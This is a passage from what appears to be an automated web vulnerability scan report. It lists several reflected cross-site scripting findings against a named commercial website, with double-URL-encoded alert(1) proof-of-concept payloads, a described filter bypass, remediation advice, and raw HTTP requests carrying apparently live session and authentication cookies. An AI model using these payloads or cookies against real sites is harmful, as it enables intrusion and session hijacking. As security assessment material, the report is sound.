The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social1f4ab%2522%253balert%25281%2529%252f%252f6f48b0a67c6/fb-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social1f4ab";alert(1)//6f48b0a67c6/fb-25x25","E404") ;
   </script>
...[SNIP]...

1.477. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/fb-25x25 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/fb-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242a7%2522%253balert%25281%2529%252f%252fe3030dcf4ae was submitted in the REST URL parameter 5. This input was echoed as 242a7";alert(1)//e3030dcf4ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/fb-25x25242a7%2522%253balert%25281%2529%252f%252fe3030dcf4ae HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/fb-25x25242a7";alert(1)//e3030dcf4ae","E404") ;
   </script>
...[SNIP]...

1.478. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21501%2522%253balert%25281%2529%252f%252fa466074d5bc was submitted in the REST URL parameter 1. This input was echoed as 21501";alert(1)//a466074d5bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc21501%2522%253balert%25281%2529%252f%252fa466074d5bc/medialib/sigma-aldrich/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc21501";alert(1)//a466074d5bc/medialib/sigma-aldrich/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.479. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf4ce%2522%253balert%25281%2529%252f%252f53361c3178b was submitted in the REST URL parameter 2. This input was echoed as bf4ce";alert(1)//53361c3178b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibbf4ce%2522%253balert%25281%2529%252f%252f53361c3178b/sigma-aldrich/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibbf4ce";alert(1)//53361c3178b/sigma-aldrich/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.480. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f03e%2522%253balert%25281%2529%252f%252f8f2ccd45570 was submitted in the REST URL parameter 3. This input was echoed as 4f03e";alert(1)//8f2ccd45570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich4f03e%2522%253balert%25281%2529%252f%252f8f2ccd45570/social/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:47 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich4f03e";alert(1)//8f2ccd45570/social/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.481. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6e6a%2522%253balert%25281%2529%252f%252fa9092da1e1a was submitted in the REST URL parameter 4. This input was echoed as e6e6a";alert(1)//a9092da1e1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/sociale6e6a%2522%253balert%25281%2529%252f%252fa9092da1e1a/linkedin-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
